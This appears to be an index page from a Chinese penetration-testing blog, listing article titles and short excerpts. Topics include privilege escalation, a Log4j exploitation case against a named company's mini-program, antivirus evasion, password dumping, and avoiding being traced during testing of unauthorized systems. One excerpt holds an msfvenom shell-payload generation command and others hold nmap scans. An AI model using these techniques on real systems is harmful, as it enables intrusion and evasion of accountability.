新手学习渗透测试之提权
前言:什么是提权?提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。Windows:User >> SystemLinux:User >> Root在日常渗透测试过程中,我们常常会先是拿到w...
蓝队分析研判工具箱,溯源辅助|资产测绘搜索|代码格式化|攻击流量解密|
免责声明由于传播、利用本站所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知...
没参加过护网?怎么模拟真实情况???
前言来自群友的问题“护网主要干啥啊?”“设备长啥样啊?”“设备是操作啥的啊?”“安全设备一般都是什么样啊?”正文本片文章,以模拟真实设备以及真实环境进行学习,以虚拟机的方式,做到环...
实战|页面篡改安全事件应急流程
一、认识网页篡改了解网页篡改类型网页篡改指的是黑客通过技术手段上传了webshell(网页木马)拿到控制权限后对网站的内容及页面进行删、增、改。网站首页替换型:首页面index.html、default.ht...
小程序安全漏洞分析:美孚养护达人Log4j漏洞利用案例
概述近期在对'美孚养护达人'微信小程序进行安全测试时,发现其后台系统存在严重的Log4j漏洞(CVE-2021-44228)。本文详细记录了漏洞发现、验证和利用的全过程,旨在为安全研究人员提供参考,同...
在Kali Purple上安装Elastic和Kibana教程加演示 Reverse Shell 攻击被阻止了
在Kali Purple上安装Elastic和Kibana教程加演示 Reverse Shell 攻击被阻止了
零基础从零到拿一下WordPress博客网站
实战步骤 1:主机扫描发现 采用arp-scan.netdiscover.fping nmap等工具,对网络进行主机发现扫描实战步骤2:端口服务扫描使用nmap对发现的主机IP进行端口服务扫描命令: nmap -sS -sV -p- -v -...
免杀技术实际演示
生成反弹shellmsfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe加密编码反弹shellmsfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lpor...
新手学习渗透之进程中抓下管理员明文密码
前言:推荐阅读:继续上一章的远程桌面连接,在C盘下找到这两个文件。2.试着打开却发现没有权限 3.打开了txt文件的属性-安全-高级,把权限全部都改成允许。可以读取txt了,解压密码是管理员密...
一款集成了AI的CTF综合工具
介绍随着网络安全领域的不断发展,网络安全竞赛(Capture The Flag,简称CTF)已经成为衡量网络安全人才技能水平的重要平台。CTF竞赛不仅要求参赛者具备深厚的网络安全理论知识,还需要他们具备...
渗透测试反溯源
为什么要反溯源在很多企业src,或者在攻防演练的过程中如何避免被溯源?很多小白为了CNVD证书,不断的去寻找一些权重比较大的公司的业务系统进行渗透测试,但是这些系统都是没有经过授权的,那...
如何在手机上搭建ChatGpt聊天机器人
Termux操作:apt update && apt upgrade apt install -y openssh proot proot-distro执行 :termux-setup-storage安装debian proot-distro install debian进入debian proot-distro logi...
渗透测试辅助工具箱
0x01 说明渗透测试辅助工具箱运行条件:jdk8+ 双击即可运行反弹shell,命令生成器,自动编码,输入对应IP端口即可,实现一劳永逸,集成一些小工具,辅助渗透,提高效率输入框说明Lhost:攻击机I...
